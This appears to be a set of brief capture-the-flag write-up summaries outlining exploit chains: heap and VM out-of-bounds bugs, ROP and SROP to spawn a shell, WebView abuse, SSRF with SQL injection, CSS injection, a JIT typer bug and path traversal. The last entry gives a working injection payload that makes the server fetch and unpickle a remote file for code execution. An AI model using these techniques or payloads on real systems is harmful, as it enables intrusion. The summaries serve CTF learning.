tl;dr

• Giving custom array size of NaN, passes checks while allowing OOB r/w
• Use OOB r/w to get libc, stack (environ) addresses
• Craft fake chunk on array and overwrite fastbin fd
• Reset machine to allocate register context on fake chunk
• Overwrite VM sp with real stack
• Push ropchain onto stack and halt VM to execute ropchain

tl;dr

• This challenge is a JIT VM
• The VM logic implements modular equations

tl;dr

• Exploit Android Webview Javascript Interface
• Communicate with a Service via AIDL

tl;dr

• SSRF using file_get_contents() and CRLF in ini_set()
• basic Header quirks to bypass waf
• sqli using column trick in SQLite to get the flag

tl;dr

• Double fetch race Condition in store_note function.
• overwrite size during race window to get buffer overflow.
• Do SROP for execve(“/bin/sh\x00”)

tl;dr
- CSS injection using url forging
- leaking password using :empty selectors

tl;dr

• Giving size > 48 causes heap OOB r/w of 16 bytes
• Use OOB r/w get leaks and overwrite objects for rip control

tl;dr

• Simple typer bug, range of BitAnd opcode is assumed to be [1, operand] when in reality it is [0, operand].
• Use range assumptions to create unchecked integer underflow.
• Bypass array bounds checks and obtain OOB write, overwrite size of array to get overlap.
• Use double & object array overlap to create addrOf & fakeObj primitives.
• Create overlapping fake array using StructureID leak to obtain arbitrary R/W.

tl;dr
-Get the docker-entrypoint.sh using /static../docker-entrypoint.sh
-Get the challenge files using /static../panda/cgi-bin/search_currency.py
-Host your exploit and use x‘|@pd.read_pickle(‘http://0.0.0.0:6334/output.exploit')|‘ to execute the exploit